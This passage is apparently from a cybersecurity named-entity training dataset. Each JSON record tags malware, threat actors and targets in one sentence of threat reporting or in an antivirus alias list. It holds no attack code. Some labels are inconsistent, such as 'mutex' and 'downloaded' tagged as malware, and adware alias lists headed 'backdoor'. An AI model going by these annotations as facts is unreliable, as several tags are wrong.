"source": "cyner2_train"}} {"text": "Distribution via trojanized updates to MeDoc users", "spans": {"MALWARE: trojanized updates": [[17, 35]], "ORGANIZATION: MeDoc users": [[39, 50]]}, "info": {"id": "cyner2_train_006937", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Ransom.Crypren.11 Ransom_Denisca.R011C0DLD17 Ransom_Denisca.R011C0DLD17 Trojan.Win32.Crypren.emfrxs Trojan.MulDrop7.20062 BehavesLike.Win32.PWSZbot.dc Trojan.Win32.Crypt W32/Trojan.HSTQ-8964 
TR/AD.Ergop.ipwuu Trj/CI.A Trojan.Crypren!pGn+9M0dsUI W32/Kryptik.FPNC!tr Win32/Trojan.Ransom.a8a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006938", "source": "cyner2_train"}} {"text": "This included altering the icon of the executable to appear as other file types as well as decoy documents to trick users into thinking they had opened a legitimate file.", "spans": {}, "info": {"id": "cyner2_train_006940", "source": "cyner2_train"}} {"text": "What do I need to do ? It is extremely unlikely you or someone you know was affected by Chrysaor malware .", "spans": {"MALWARE: Chrysaor": [[88, 96]]}, "info": {"id": "cyner2_train_006941", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Risk.Deceptor.Lmla Program.Unwanted.2594 Trojan:Win32/Spideepri.A PUP/Win32.SpeedItUpFree.R211310 Trojan.Spideepri", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006944", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Mimikatz.Win32.268 Win32.Trojan.WisdomEyes.16070401.9500.9999 Hacktool.Mimikatz Trojan.Win32.Mimikatz.ergkpd Application.Win32.HackTool.Mimikatz.DC Tool.PassView.1872 HackTool.Inject.ew Trojan[PSW]/Win32.Mimikatz Trojan/Win32.Mimikatz.R202679 TrojanPSW.Mimikatz HackTool.Mimikatz Trj/CI.A Trojan.Application.Hacktool.Mimikatz.1 Win32.Trojan-qqpass.Qqrob.Tclv HackTool.Mimikatz hacktool.mimikatz Win32/Trojan.PSW.c71", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006945", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm.Olufus.A3 WORM_VB_FB25010D.UVPM Win32.Worm.VB.rb WORM_VB_FB25010D.UVPM Trojan.Win32.Cosmu.dipp Trojan.Win32.Crypt.dsqpuq Trojan.MulDrop5.34309 Net-Worm.Win32.Cynic Worm:Win32/Olufus.A Trojan.Heur.E2E727 W32.Virut.low6 Trojan.Win32.Cosmu.dipp Trojan/Win32.Bredolab.R151314 TScope.Trojan.VB Win32/VB.OKI", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006946", "source": "cyner2_train"}} {"text": "A 
backdoor also known as: W32.KlassTT.Trojan Backdoor.Sdbot.6331 Troj.Dropper.W32.Sysn!c Win32.Trojan.WisdomEyes.16070401.9500.9991 Backdoor.Trojan Trojan-Dropper.Win32.Sysn.brns Backdoor.Win32.IRCBot.60928.J BackDoor.IRC.Huxor.59 BehavesLike.Win32.Backdoor.qh Backdoor.Win32.SdBot Trojan[Backdoor]/Win32.IRCBot Trojan.Kazy.D14BCA Trojan-Dropper.Win32.Sysn.brns Backdoor:Win32/Arwobot.B Worm/Win32.IRCBot.R4516 Win32.Trojan-dropper.Sysn.Lmuh Win32/Trojan.8b1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006947", "source": "cyner2_train"}} {"text": "These embedded OLE Word documents then contain embedded Adobe Flash .SWF files that are designed to exploit Adobe Flash vulnerabilities.", "spans": {"VULNERABILITY: exploit Adobe Flash vulnerabilities.": [[100, 136]]}, "info": {"id": "cyner2_train_006948", "source": "cyner2_train"}} {"text": "Iranian threat agent OilRig has been targeting multiple organisations in Israel and other countries in the Middle East since the end of 2015.", "spans": {"THREAT_ACTOR: Iranian threat agent OilRig": [[0, 27]], "ORGANIZATION: multiple organisations": [[47, 69]]}, "info": {"id": "cyner2_train_006949", "source": "cyner2_train"}} {"text": "In the course of this tactical hunt for unidentified code, RSA discovered a sophisticated attack on a software supply-chain involving a Trojan inserted in otherwise legitimate software; software that is typically used by enterprise system administrators.", "spans": {"ORGANIZATION: software supply-chain": [[102, 123]], "MALWARE: Trojan": [[136, 142]], "SYSTEM: legitimate software; software": [[165, 194]], "SYSTEM: enterprise system administrators.": [[221, 254]]}, "info": {"id": "cyner2_train_006950", "source": "cyner2_train"}} {"text": "Neuron and Nautilus are malicious tools designed to operate on Microsoft Windows platforms, primarily targeting mail servers and web servers.", "spans": {"MALWARE: Neuron": [[0, 6]], "MALWARE: Nautilus": [[11, 19]], "MALWARE: malicious tools": 
[[24, 39]], "SYSTEM: Microsoft Windows platforms,": [[63, 91]], "ORGANIZATION: mail servers": [[112, 124]], "ORGANIZATION: web servers.": [[129, 141]]}, "info": {"id": "cyner2_train_006951", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.MambaAHQc.Trojan Trojan.Python.Win32.34 Trojan/Mamba.g Win32.Trojan.WisdomEyes.16070401.9500.9555 BehavesLike.Win32.Trojan.vh Python/Blakamba.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006952", "source": "cyner2_train"}} {"text": "The attack compromised their devices and exfiltrated data to the attackers' command and control server.", "spans": {"SYSTEM: devices": [[29, 36]], "THREAT_ACTOR: attackers'": [[65, 75]]}, "info": {"id": "cyner2_train_006954", "source": "cyner2_train"}} {"text": "The earliest we observed this spreader variant pushing Mirai downloaders was January 2017.", "spans": {"MALWARE: Mirai downloaders": [[55, 72]]}, "info": {"id": "cyner2_train_006957", "source": "cyner2_train"}} {"text": "In late 2013–early 2014, a compromised FTP client dubbed StealZilla, based on the open source FileZilla FTP client was discovered.", "spans": {"MALWARE: StealZilla,": [[57, 68]], "SYSTEM: FTP client": [[104, 114]]}, "info": {"id": "cyner2_train_006958", "source": "cyner2_train"}} {"text": "This particular APT is targeting organizations that include weapons manufacturers, human rights activists, and pro-democracy groups, among others.", "spans": {"THREAT_ACTOR: APT": [[16, 19]], "ORGANIZATION: organizations": [[33, 46]], "ORGANIZATION: weapons manufacturers, human rights activists,": [[60, 106]], "ORGANIZATION: pro-democracy groups,": [[111, 132]]}, "info": {"id": "cyner2_train_006959", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Danmec.E.iw5 Trojan.Asprox W32/Danmec.R TROJ_DANMEC.SM Trojan.Win32.Danmec!IK TrojWare.Win32.Kryptik.CG Trojan.DownLoad2.37322 TR/Spy.Web.H TROJ_DANMEC.SM Worm/Aspxor.ey Trojan/Win32.Danmec Trojan.Danmec 
Trojan.Asprox!rem Trojan.Win32.Danmec W32/Danmec.C!tr Trj/Damnec.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006960", "source": "cyner2_train"}} {"text": "The ART team at Fortinet has discovered a new malware named Proteus, a multifunctional botnet written in .NET that appears to be a proxy, coin miner, e-commerce merchant account checker, and keylogger.", "spans": {"ORGANIZATION: The ART team": [[0, 12]], "ORGANIZATION: Fortinet": [[16, 24]], "MALWARE: malware": [[46, 53]], "MALWARE: Proteus,": [[60, 68]], "MALWARE: botnet": [[87, 93]], "SYSTEM: .NET": [[105, 109]], "MALWARE: proxy, coin miner, e-commerce merchant account checker,": [[131, 186]], "MALWARE: keylogger.": [[191, 201]]}, "info": {"id": "cyner2_train_006962", "source": "cyner2_train"}} {"text": "From the Nymaim malware, it leverages the dropper's stealth and persistence; the Gozi ISFB parts add the banking Trojan's capabilities to facilitate fraud via infected Internet browsers.", "spans": {"MALWARE: Nymaim malware,": [[9, 24]], "MALWARE: Gozi ISFB": [[81, 90]], "MALWARE: banking Trojan's": [[105, 121]], "SYSTEM: infected Internet browsers.": [[159, 186]]}, "info": {"id": "cyner2_train_006965", "source": "cyner2_train"}} {"text": "Backdoor that installs itself at %Application Data%\\remcos", "spans": {"MALWARE: Backdoor": [[0, 8]]}, "info": {"id": "cyner2_train_006967", "source": "cyner2_train"}} {"text": "Based on strings found in the samples we analyzed, we have named this backdoor Gazer", "spans": {"MALWARE: backdoor": [[70, 78]], "MALWARE: Gazer": [[79, 84]]}, "info": {"id": "cyner2_train_006969", "source": "cyner2_train"}} {"text": "It spreads via unusual means, including the hijacking of traffic from nationwide ISPs, an SNS worm on Windows, and an offline app installation and community promotion.", "spans": {"MALWARE: SNS worm": [[90, 98]], "SYSTEM: Windows,": [[102, 110]], "SYSTEM: offline app": [[118, 129]]}, "info": {"id": "cyner2_train_006970", "source": 
"cyner2_train"}} {"text": "A backdoor also known as: Trojan.Dynamer Win32.Trojan.WisdomEyes.16070401.9500.9986 Trojan.Win32.Dwn.efyiis Trojan.DownLoader22.7328 BehavesLike.Win32.PUPXAA.kc Trojan:MSIL/Watam.A Trojan.MSIL.Spy", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006972", "source": "cyner2_train"}} {"text": "The payload we got also specifically targets Korean banks by modifying the infected systems hosts file to redirect traffic from Korean banks to its controlled server.", "spans": {"MALWARE: payload": [[4, 11]], "ORGANIZATION: Korean banks": [[45, 57], [128, 140]], "SYSTEM: infected systems": [[75, 91]]}, "info": {"id": "cyner2_train_006974", "source": "cyner2_train"}} {"text": "This particular piece of malware uses an open source VB6 piece of malware called vnLoader'.", "spans": {"MALWARE: malware": [[25, 32], [66, 73]], "MALWARE: vnLoader'.": [[81, 91]]}, "info": {"id": "cyner2_train_006975", "source": "cyner2_train"}} {"text": "This group has been active since 2010. 
We dub this operation Shrouded Crossbow, after a mutex in a backdoor the group developed.", "spans": {"THREAT_ACTOR: group": [[5, 10], [112, 117]], "THREAT_ACTOR: operation Shrouded Crossbow,": [[51, 79]], "MALWARE: mutex": [[88, 93]], "MALWARE: backdoor": [[99, 107]]}, "info": {"id": "cyner2_train_006976", "source": "cyner2_train"}} {"text": "A backdoor also known as: Android.Trojan.Boxer.as HEUR:Trojan-SMS.AndroidOS.FakeInst.a HEUR:Trojan-SMS.AndroidOS.FakeInst.a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006977", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Dynamer.FC.314 Win32.Trojan.WisdomEyes.16070401.9500.9959 Trojan.Win32.Inject.aexnv Trojan.DownLoader24.51009 TR/AD.NETCryptor.dneew Trojan/Win32.Inject Backdoor:MSIL/Omaneat.B Trojan.MSILPerseus.D17E4F Trojan/Win32.Fsysna.C1935209 Trojan.Win32.Inject.aexnv Trj/GdSda.A Win32.Trojan.Inject.Fsc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006978", "source": "cyner2_train"}} {"text": "FireEye Labs recently discovered a previously unknown variant of the APT backdoor XSLCmd – OSX.XSLCmd – which is designed to compromise Apple OS X systems.", "spans": {"ORGANIZATION: FireEye Labs": [[0, 12]], "MALWARE: unknown variant": [[46, 61]], "MALWARE: backdoor XSLCmd – OSX.XSLCmd –": [[73, 103]], "SYSTEM: Apple OS X systems.": [[136, 155]]}, "info": {"id": "cyner2_train_006979", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.PWS.Kukel.A Trojan-PWS/W32.Kukel.14116 Trojan.PWS.Kukel.A Trojan/PSW.Kukel Trojan.PWS.Kukel.A Win32.Trojan.WisdomEyes.16070401.9500.9985 TROJ_KUKEL.A Trojan.PWS.Kukel.A Trojan-PSW.Win32.Kukel Trojan.PWS.Kukel.A Trojan.Win32.Kukel.hjwe Trojan.Win32.PSWKukel.14116 Troj.PSW32.W.Kukel!c Trojan.PWS.Kukel.A TrojWare.Win32.PSW.Kukel Trojan.PWS.Kukel.A Trojan.PWS.Kukel Trojan.Kukel.Win32.4 TROJ_KUKEL.A W32/Risk.QXSE-2226 Trojan/PSW.Kukel TR/PSW.Kukel.1 Trojan-PSW.Win32.Kukel TrojanPSW.Kukel Win32/PSW.Kukel 
Win32.Trojan-qqpass.Qqrob.Wsko Trojan.PWS.Kukel!uom8kUpytHQ W32/Kukel.A!tr.pws", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006981", "source": "cyner2_train"}} {"text": "This entry is to explain features of Datper, malware used for targeted attacks against Japanese organisations and how to detect it from the logs.", "spans": {"MALWARE: Datper, malware": [[37, 52]], "ORGANIZATION: Japanese organisations": [[87, 109]]}, "info": {"id": "cyner2_train_006982", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Tvt Trojan.Korplug.Win32.309 Trojan.Zusy.D41CD9 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Tvt.ll Trojan.KeyLogger.27522 Backdoor:Win32/Sogu.A!dha Trojan.Win32.Tvt.ll Backdoor/Win32.Etso.R17333 Trojan.Win32.Korplug", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006983", "source": "cyner2_train"}} {"text": "Detected as ANDROIDOS_SLOCKER.OPSCB, this new SLocker mobile ransomware variant features new routines that utilize features of the Chinese social network QQ, along with persistent screen-locking capabilities.", "spans": {"MALWARE: SLocker mobile ransomware variant": [[46, 79]], "ORGANIZATION: the Chinese social network QQ,": [[127, 157]]}, "info": {"id": "cyner2_train_006984", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9984 Trojan-Banker.Win32.Metel.cai Trojan.Win32.Metel.edlvqj Troj.Banker.W32.Metel!c Trojan.Bayanker.42 BehavesLike.Win32.FakeAlertSecurityTool.dc Trojan.Banker.Metel.ys TR/Kryptik.rfzx Trojan:Win32/Exgectow.A Trojan-Banker.Win32.Metel.cai Trojan/Win32.Dorv.R166106 Trj/CI.A Win32/Corkow.AI Win32.Outbreak Win32/Trojan.9df", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006985", "source": "cyner2_train"}} {"text": "Recent new reporting was released on the DragonOK group which unveiled the many versions of the Sysget backdoor as well as the IsSpace backdoor.", "spans": 
{"THREAT_ACTOR: the DragonOK group": [[37, 55]], "MALWARE: versions": [[80, 88]], "MALWARE: Sysget backdoor": [[96, 111]], "MALWARE: the IsSpace backdoor.": [[123, 144]]}, "info": {"id": "cyner2_train_006986", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Vehidis Trojan.Win32.Vehidis.wpm Trojan.Win32.Crypted.dodbbd Trojan.Win32.Z.Vehidis.24576.K Troj.W32.Vehidis!c Trojan.Vehidis.Win32.1902 Trojan.Vehidis.hd BDS/Sakkair.ebcng Backdoor:Win32/Sakkair.A Trojan.Win32.Vehidis.wpm Trojan/Win32.Farfli.R115053 Trojan.Vehidis Trj/CI.A Win32.Trojan.Vehidis.Hquw", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006987", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.MSIL Win32.Trojan.WisdomEyes.16070401.9500.9655 Infostealer.Limitail Trojan.Win32.Z.Limitail.303616 Trojan.DownLoader19.57204 BehavesLike.Win32.PUPXAG.dc TR/Dropper.MSIL.lrzyl Trojan.MSILPerseus.D234A0 TrojanSpy:MSIL/Plimrost.B Trojan/Win32.Kryptik.C2400864 Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006988", "source": "cyner2_train"}} {"text": "Standing out because of its prevalence and its sophistication, Stantinko turned out to be quite a puzzle to solve.", "spans": {}, "info": {"id": "cyner2_train_006989", "source": "cyner2_train"}} {"text": "This utility does several interesting things to evade antivirus detection.", "spans": {}, "info": {"id": "cyner2_train_006990", "source": "cyner2_train"}} {"text": "A backdoor also known as: Android.Adware.Airpush.55AE Android.Adware.Plankton.A Android.Adware.Plankton.A Android.Trojan.Plankton.k AndroidOS/Plankton.B A.H.Pri.Afoynq.F Trojan.Android.Airpush.djpqsd Adware.MultiAds!1.9D9E Android.Adware.Plankton.A Android.Adware.Plankton Adware.Airpush.3.origin AndroidOS/Plankton.B Android.Adware.Plankton.A Android.Adware.Plankton!c Android-PUP/Airpush.2ac1 Android.Adware.Plankton.A Adware.AndroidOS.AirPush.a AdWare.AndroidOS.Apperhand", "spans": {"MALWARE: 
backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006991", "source": "cyner2_train"}} {"text": "Successful exploitation seems to be possible on all currently supported versions of MS Office up to and including the MS15-022 patch.", "spans": {"VULNERABILITY: exploitation": [[11, 23]], "SYSTEM: MS Office": [[84, 93]]}, "info": {"id": "cyner2_train_006992", "source": "cyner2_train"}} {"text": "Proofpoint researchers have observed a well-known Russian-speaking APT actor usually referred to as Turla using a new .NET/MSIL dropper for an existing backdoor called JS/KopiLuwak.", "spans": {"ORGANIZATION: Proofpoint researchers": [[0, 22]], "THREAT_ACTOR: Russian-speaking APT actor": [[50, 76]], "MALWARE: Turla": [[100, 105]], "MALWARE: backdoor": [[152, 160]]}, "info": {"id": "cyner2_train_006993", "source": "cyner2_train"}} {"text": "The malware itself is a fully featured RAT, which uses a compressed, optionally encrypted, raw TCP socket and binary message protocol for command and control communications.", "spans": {"MALWARE: malware": [[4, 11]], "MALWARE: RAT,": [[39, 43]]}, "info": {"id": "cyner2_train_006997", "source": "cyner2_train"}} {"text": "This time, however, attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan, which in turn downloaded the PlugX Remote Access Trojan RAT.", "spans": {"THREAT_ACTOR: attackers": [[20, 29]], "VULNERABILITY: exploiting": [[108, 118]], "MALWARE: ZeroT Trojan,": [[168, 181]], "MALWARE: downloaded": [[196, 206]], "MALWARE: PlugX Remote Access Trojan RAT.": [[211, 242]]}, "info": {"id": "cyner2_train_006998", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Banker.Win32.89325 Trojan/Spy.Banker.yss Trojan.Win32.Z.Banker.5002130 Trojan.DownLoader13.22038 Trojan/Win32.Scar Win32.Troj.Undef.kcloud PWS:Win32/Mujormel.A TScope.Trojan.Delf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": 
"cyner2_train_006999", "source": "cyner2_train"}} {"text": "Within the last week, the now infamous man-in-the-browser MITB banking malware Dyreza appears to have significantly expanded its target set of entities from which to steal credentials.", "spans": {"MALWARE: man-in-the-browser MITB banking malware Dyreza": [[39, 85]]}, "info": {"id": "cyner2_train_007000", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9989 W32/Trojan2.KJRE Infostealer.Bancos Win.Spyware.Banker-3740 Trojan.Win32.Banker.brismu Troj.Spy.W32.Delf.gmb!c Trojan.PWS.Spy.281 Trojan.Banker.Win32.115104 BehavesLike.Win32.Ramnit.cc W32/Trojan.FKOH-7228 TrojanSpy.Delf.efw W32.InfoStealer.Bancos Win32.Troj.Delf.kcloud Trojan/Win32.Xema.C140526 Trj/CI.A Win32.Trojan.Spy.Edyh TrojanSpy.Delf!R/OQYQsjYN8 Trojan-Spy.Win32.Bancos W32/DelpBanc.A!tr Win32/Trojan.Spy.1ee", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007001", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Vetor.PE Virus.Win32.Virut.1!O W32.Virut.G Virus.Virut.Win32.1939 W32.Virut.CF Win32/Virut.17408 PE_VIRUX.S-3 Win.Worm.Taz-1 Virus.Win32.Virut.ce Virus.Win32.Virut.hpeg PE_VIRUX.S-3 Win32/Virut.bt Virus/Win32.Virut.ce Trojan:Win32/VBloader.B Virus.Win32.Virut.ce Win32/Virut.F Virus.Virut.14 Win32/Virut.NBP Trojan-Banker.Win32.Bancos W32/Sality.AO Virus.Win32.VirutChangeEntry.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007002", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.MiadheardLTM.Trojan Backdoor.Mask.E Trojan/W32.Mask.17920 Trojan.Seedna Trojan.SGH.Win32.1 Troj.W32.SGH.o!c Backdoor.Mask.E W32/Mask.C Backdoor.Weevil.B BKDR_CARETO.A Backdoor.Mask.E Trojan.Win32.SGH.o Backdoor.Mask.E Trojan.Win32.SGH.ctugql Backdoor.Mask.E Backdoor:W32/Mask.A BKDR_CARETO.A Backdoor.Mask W32/Mask.NPPK-3802 Trojan.Win32.a W32.Trojan.Careto TR/Heap.A.4 Trojan/Win32.SGH Trojan:Win32/Seedna.A Trojan.Win32.SGH.o 
Trojan/Win32.Careto.R97388 Backdoor.Mask Trj/Careto.A Win32/Appetite.C Win32.Trojan.Sgh.Srmy W32/Themas.G!tr Win32/Trojan.aa5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007003", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Ptakks.217 Backdoor.Ptakks.217 Backdoor.Win32.Ptakks!O Trojan.Win32.Ptakks.bdqil Backdoor.Trojan Win32/Ptakks.C BKDR_PTAKKS.B Trojan.Ptakks.216 Backdoor.Win32.Ptakks.217 Backdoor.Ptakks.217 Backdoor.Ptakks.217!9LO95ovp5Xo Backdoor.Win32.Ptakks_217.Svr Backdoor.Ptakks.217 Backdoor.Win32.Ptakks.2_17 Backdoor.Ptakks.217 BackDoor.Ptakks.217 BDS/Ptakks.2 BKDR_PTAKKS.B Backdoor/Ptakks.217 Win32.Hack.Ptakks217.kcloud Backdoor:Win32/Ptakks.2_17 Backdoor.Ptakks.217 W32/Risk.CITI-5061 Trojan/Win32.HDC Backdoor.Ptakks Bck/Ptakks.217 Win32/Ptakks.2_17 PE:Trojan.Ptakks.217!1073777762 Backdoor.Win32.Ptakks W32/Ptakks.217!tr.bdr BackDoor.Ptakks Backdoor.Win32.Ptakks.AY", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007005", "source": "cyner2_train"}} {"text": "It is extremely popular and is currently ranked #10 under Top free Android apps.", "spans": {"SYSTEM: Android apps.": [[67, 80]]}, "info": {"id": "cyner2_train_007006", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Clod22a.Trojan.8281 TrojanDownloader.Bunabom Trojan.Delf.Win32.72720 Trojan/Delf.qzl TROJ_SPNR.0BKS13 TROJ_SPNR.0BKS13 Troj.Delf.Sjr!c trojandownloader.win32.bunabom.a TR/Delf.sjr.1 TrojanDownloader:Win32/Bunabom.A Trojan.Delf!fsmGjeXPdPQ Trojan-Dropper.Delf Win32/Trojan.4da", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007008", "source": "cyner2_train"}} {"text": "A backdoor also known as: Exploit/W97.CVE-2012-0158 Exp.OLE.CVE-2012-0158.AA Exploit.Ole2.Toolbar!c Win32.Exploit.ShellCode.b Trojan.Mdropper TROJ_CVE20120158.MEVP Win.Trojan.TerminatorRat-2 Exploit.OLE2.Toolbar.a Exploit.ComObj.CVE-2012-0158.hzuf TROJ_CVE20120158.MEVP Trojan.DJPK-4 
Exploit.CVE-2012-0158.f MSWord/Toolbar.A!exploit Trojan[Exploit]/MSWord.CVE-2012-0158.di DOC.S.CVE-2012-0158.1106567 Exploit.OLE2.Toolbar.a Exploit.CVE-2012-0158 Exploit.WORD.CVE-2012-0158.A Exploit.CVE-2012-0158 virus.exp.20120158", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007010", "source": "cyner2_train"}} {"text": "HtpRAT, a newly discovered Remote Access Trojan RAT extends the capabilities of traditional RATs by providing complete remote execution of custom commands and programming.", "spans": {"MALWARE: HtpRAT,": [[0, 7]], "MALWARE: Remote Access Trojan RAT": [[27, 51]], "MALWARE: RATs": [[92, 96]]}, "info": {"id": "cyner2_train_007011", "source": "cyner2_train"}} {"text": "The library includes such operations as : Get address of cybercriminal C & C server Get configuration file with web injects from C & C , as well as default list of injects Scan for app package names that generated AccessibilityEvent events in the list of known banking/antivirus/other popular apps Set malware as default SMS app Get address of the phishing page that opens when the app runs , and others getStartWebUrl function – get address of phishing page The configuration file contains a list of injects for mobile banking apps – links to phishing pages matching the mobile banking app used by the user .", "spans": {}, "info": {"id": "cyner2_train_007012", "source": "cyner2_train"}} {"text": "A backdoor also known as: Ransomware.Weelsof.C5 Trojan/Weelsof.b Trojan.Symmi.D1959 Ransom_Weelsof.R002C0CAD18 Win32.Trojan.Kryptik.tx W32/Trojan2.NUBG Win32/Weelsof.BC Ransom_Weelsof.R002C0CAD18 Trojan.Win32.Weelsof.bbkjex Trojan.Win32.Z.Weelsof.116224 Trojan.Winlock.6870 Trojan.Weelsof.Win32.258 W32/Trojan.ECLA-1171 Trojan/Weelsof.ok TR/Weelsof.wm Trojan/Win32.Weelsof Ransom:Win32/Weelsof.C Trojan/Win32.Weelsof.C408750 Trj/CI.A Trojan.Weelsof.B Win32/Weelsof.B Win32.Trojan.Weelsof.cuoj Trojan.Weelsof!AcPYBHX50TA Win32/Trojan.Ransom.434", "spans": {"MALWARE: backdoor": 
[[2, 10]]}, "info": {"id": "cyner2_train_007013", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor/W32.Protux.61400 Backdoor.Protux Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan BKDR_PROTUX.SMZKEB-A Win.Trojan.Protux-22 Trojan.Win32.Protux.illnz TrojWare.Win32.TrojanDownloader.JMXQ.~0 BackDoor.Diho.190 Backdoor.Protux.Win32.108 BKDR_PROTUX.SMZKEB-A Backdoor.Win32.Protux Backdoor/Protux.dj Trojan:Win32/Dingu.A Trojan[Backdoor]/Win32.Protux Trojan.Heur.E43D7C Backdoor:Win32/Protux.B!dll Trojan/Win32.Xema.R89528 Backdoor.Protux Trj/Protux.C Win32/Protux.NAF Win32.Backdoor.Protux.Pfsy Backdoor.Protux!S6uzS9ogTK0 W32/Protux.KJ!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007014", "source": "cyner2_train"}} {"text": "These malicious apps are distributed via SEO-optimized fake websites, with keywords targeting hot scandals and affairs used.", "spans": {"MALWARE: malicious apps": [[6, 20]]}, "info": {"id": "cyner2_train_007015", "source": "cyner2_train"}} {"text": "Earlier this year, the Andromeda botnet was seen using macro-based malware, which is yet again an old trick.", "spans": {"MALWARE: Andromeda botnet": [[23, 39]], "MALWARE: macro-based malware,": [[55, 75]]}, "info": {"id": "cyner2_train_007016", "source": "cyner2_train"}} {"text": "First observed as early as 2004, NetTraveler is a Trojan used widely in targeted attacks.", "spans": {"MALWARE: NetTraveler": [[33, 44]], "MALWARE: Trojan": [[50, 56]]}, "info": {"id": "cyner2_train_007017", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.QqpaNHm.Trojan Backdoor.Hupigon.275309 Trojan.Danginex.A2 Backdoor.Hupigon.275309 Backdoor/Hupigon.pgzz Backdoor.Hupigon.D4336D Win32.Trojan.FakeIME.d Win32/Oflwr.A!crypt Backdoor.Hupigon.275309 Trojan.Win32.Hupigon.chvyyc Backdoor.Hupigon.275309 Backdoor.Hupigon.275309 BackDoor.BlackHole.19996 Backdoor.Hupigon.Win32.133590 Backdoor.Win32.Hupigon TR/Orsam.A.7773 
Trojan[Backdoor]/Win32.Hupigon Unwanted/Win32.HackTool.R19815 Backdoor.Hupigon Trojan.Offend!DNC2JYmeA/w", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007018", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Tinba.19899 W32/Trojan.WNMW-0038 TROJ_MALKRYP.SM7 Trojan.Win32.Androm.dqyyyn Trojan.PWS.Tinba.161 Trojan.Zbot.Win32.178596 TROJ_MALKRYP.SM7 BehavesLike.Win32.PWSZbot.dc Trojan/PSW.Tepfer.ccuq TR/Bunitu.A.194 Trojan.Graftor.D2D2CC TrojanDownloader:Win32/Tonnejoom.A Trojan/Win32.ZBot.R141968 Trojan.ProxyChanger!r8e5ImNFSC4 Trojan.Win32.Injector W32/Injector.BZCD!tr Trojan.ProxyChanger", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007020", "source": "cyner2_train"}} {"text": "During the month of November, Proofpoint observed multiple campaigns from TA530 - an actor we have previously referred to as the personalized actor for their highly personalized campaigns - targeting customer service and managerial staff at retailers.", "spans": {"ORGANIZATION: Proofpoint": [[30, 40]], "THREAT_ACTOR: campaigns": [[59, 68], [178, 187]], "THREAT_ACTOR: TA530": [[74, 79]], "THREAT_ACTOR: actor": [[85, 90], [142, 147]], "ORGANIZATION: customer service": [[200, 216]], "ORGANIZATION: managerial staff at retailers.": [[221, 251]]}, "info": {"id": "cyner2_train_007022", "source": "cyner2_train"}} {"text": "EternalRocks is a network worm i.e. 
self-replicating, which emerged in the first half of May 2017.", "spans": {"MALWARE: EternalRocks": [[0, 12]], "MALWARE: network worm": [[18, 30]]}, "info": {"id": "cyner2_train_007023", "source": "cyner2_train"}} {"text": "We'll discuss how we discovered it, as well as possible attribution towards the individual behind these attacks.", "spans": {}, "info": {"id": "cyner2_train_007024", "source": "cyner2_train"}} {"text": "The attack used highly targeted malicious software to destroy the TV network systems.", "spans": {"MALWARE: malicious software": [[32, 50]], "SYSTEM: TV network systems.": [[66, 85]]}, "info": {"id": "cyner2_train_007025", "source": "cyner2_train"}} {"text": "Proofpoint researchers recently observed a campaign targeting telecom and military in Russia.", "spans": {"ORGANIZATION: Proofpoint researchers": [[0, 22]], "THREAT_ACTOR: campaign": [[43, 51]], "ORGANIZATION: telecom": [[62, 69]], 